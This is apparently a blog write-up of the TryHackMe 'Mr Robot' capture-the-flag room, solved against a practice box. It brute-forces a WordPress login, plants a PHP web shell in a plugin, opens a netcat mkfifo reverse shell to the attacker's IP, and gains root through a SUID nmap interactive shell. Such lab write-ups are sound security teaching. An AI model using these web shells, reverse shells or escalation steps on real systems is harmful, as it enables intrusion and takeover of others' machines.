TryHackMe: Mr Robot CTF (Writeup)

5 min readMay 8, 2023

Introduction

Chall Link: https://tryhackme.com/room/mrrobot

A brief introduction to the challenge:

Based on the Mr. Robot show, can you root this box?

Setup Environment

# Starting VPN
sudo openvpn --config <YOUR_VPN_NAME>.ovpn --data-ciphers AES-256-CBC
# Verifying our IP
ifconfig | grep "tun0" -A 1 | grep "inet"
# Adding as Host
sudo echo "<IP-BOX> ctf.thm" >> /etc/hosts
# Is host alive?
ping -c 3 ctf.thm

Now, let’s pwn this!

Recon

To start, let’s scan the host with nmap:

nmap -A ctf.thm -oN recon.txt

% cat recon.txt

# Nmap 7.93 scan initiated Mon May  8 13:05:55 2023 as: nmap -A -oN recon.txt ctf.thm
Nmap scan report for ctf.thm (10.10.222.229)
Host is up (0.22s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
443/tcp open   ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
|_http-server-header: Apache

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May  8 13:06:32 2023 -- 1 IP address (1 host up) scanned in 37.82 seconds

We don’t have much information, so let’s explore the HTTP server!

Exploring all the pages we found no possible entry point, except in the “join”. Inspecting the source code, we can see that the server runs on top of a CMS: WordPress!

By default, WordPress have a login forms named “wp-login.php”. Try to access and… BINGO!

As it’s a thematic room, we have two possible names: “mrrobot” or “elliot”.

Logging as “mrrobot”

This means there is a user elliot with an as-yet-unknown password. So, let’s find this pass.

One thing we haven’t done yet is a FUZZING of directories. Trying default files like “robots.txt” and “sitemap.xml” we found:

We found two files:

key-1-of-3.txt (First Flag)
fsocity.dic

The second file is a dictionary of passwords, downloading the file we can see that it has 858160 lines and with some words repeating itself. Let’s filter the list and prepare it for our attack.

# Downloading .dic
wget http://ctf.thm/fsocity.dic
# Removing words repeating
sort fsocity.dic | uniq > wordlist.txt

Our wordlist went from 858160 to 11451 lines!

Let’s prepare our attack.

Exploitation

Getting user and pass with Brute-Force attack

For the attack, i’ll use BurpSuite.

To begin with, let’s intercept a request to see how the parameters are made:

The username and password are placed directly in the request, so we can do a brute force attack using the “&pwd=” field as a variable.

# Send request to Intrude

> (Right Click) 
> (Send to Intruder) 

> (Payloads) 
> (Copy our wordlist.txt and Paste)

> (Positions)
> (Clear §)
> (Add §) -> (&pwd=§123§&)

> (Start Attack)

The logic is: if we have the correct password, we will be redirected, so we are expecting a 3XX code.

Now, with username and password, we can access the admin panel.

Getting a TTY Shell

Now as admin, we can edit the source of plugins:

[ Active the plugin "Simple-Tags" ]

(Plugins) > (Editor) > (Select "Simple-Tags" plugin) > (Ctrl+A + DEL)

[ PASTE THIS! ]

<?php system($_GET["cmd"]); ?>

And update file!

When we access .php file we’ll receive a shell.

# NetCat to Reverse Shell
ncat -nlvp 4444
# Encode as URL
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_IP> 4444 >/tmp/f
# Paste on
"http://ctf.thm/wp-content/plugins/simple-tags/simple-tags.php?cmd=<HERE>"

Now let’s make a tty shell:

# Type:
export TERM=xterm
python3 -c "import pty;pty.spawn('/bin/bash');"
cd

Privesc

# Exploring /home as daemon

% ls -al /home; cd /home

total 12
drwxr-xr-x  3 root root 4096 Nov 13  2015 .
drwxr-xr-x 22 root root 4096 Sep 16  2015 ..
drwxr-xr-x  2 root root 4096 Nov 13  2015 robot

% ls -al robot

total 16
drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5

% cat key-2-of-3.txt

cat: key-2-of-3.txt: Permission denied

% cat password.raw-md5

robot:[ REDACTED ]

Now that we have a possible MD5 hash password, let’s decode it.

# Logging as robot and Getting 2nd flag

% su robot
Password: [ REDACTED ]

robot@linux:~$

robot@linux:~$ cat key-2-of-3.txt

[ REDACTED ]

Now, to get Root, we can try find SUID binaries with misconfiguration:

robot@linux:~$ find / -type f -perm -4000 2> /dev/null

/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

robot@linux:~$ nmap --version

nmap version 3.81 ( http://www.insecure.org/nmap/ )

The only one that has a shell possibility is /usr/local/bin/nmap. Let’s see in GTFOBins.

robot@linux:~$ nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# whoami
root
#

We are ROOT! Let’s take last flag!

# ls -l /root

total 4
-rw-r--r-- 1 root root  0 Nov 13  2015 firstboot_done
-r-------- 1 root root 33 Nov 13  2015 key-3-of-3.txt

# cat /root/key-3-of-3.txt

[ REDACTED ]

Until Next Time…

Thank you for reading this writeup, I hope you enjoyed and learned something new today. I’m planning to post more blog posts just like these, so keep an eye here. If you would like to connect with me or give me feedback, send an email to dantsec@proton.me!